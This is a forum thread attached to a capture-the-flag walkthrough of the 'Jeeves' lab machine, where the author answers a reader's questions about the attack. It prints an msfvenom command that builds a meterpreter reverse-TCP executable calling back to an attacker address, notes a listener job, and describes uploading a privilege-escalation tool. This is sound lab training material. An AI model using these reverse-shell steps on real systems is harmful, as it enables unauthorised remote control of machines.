Jeeves Writeup by OnlyaMedic

@onlyamedic said:

@witness2pro said:
Thanks for writing this walkthrough. This is the only walkthrough that talks about using Windows Exploit Suggester that I can find so I am keen to learn how to make it work.

No problem! Thanks for reading.

  • What code was used to make 8383.exe?

That is a meterpreter reverse shell (windows/meterpreter/reverse_tcp) generated with the tool msfvenom. This tool is installed by default on Kali & is a component of the Metasploit Framework.

example command:

root@dastinia:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.151 LPORT=31337 -f exe > win_meterp_31337.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
  • In the jobs section in msfconsole, you have
    1 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.14.32:8383
    Is that needed for getting to root?

Not necessarily, I opted to use the Metasploit Framework to catch shells for this box for convenience's sake. In the Metasploit Framework the jobs command lets you know what tasks the framework is running in the background. See this link: Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec

  • How did you get meterpreter to upload this?
    meterpreter > upload /opt/serve/windows/priv/rottenpotato.exe
    I mean, how did you arrive at meterpreter? What payload did you use to arrive at meterpreter?

If you have a meterpreter shell you can upload files from your local system to the remote victim machine with the upload command. (See this link: Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec)

To get that meterpreter shell, I uploaded & executed the 8383.exe executable which was a meterpreter shell that I generated with msfvenom from before.

Let me know if that helps.

Thanks a million for such a helpful and fast response. You are the best. And yes, I have looked at almost 20 Jeeves walkthroughs and yours is the only one that bothers with using Windows Exploit Suggester.

Even IppSec failed to explain why he did not bother with Windows Exploit Suggester or equivalent, a tool that I thought is one of the first tools that comes to mind when dealing with Windows boxes.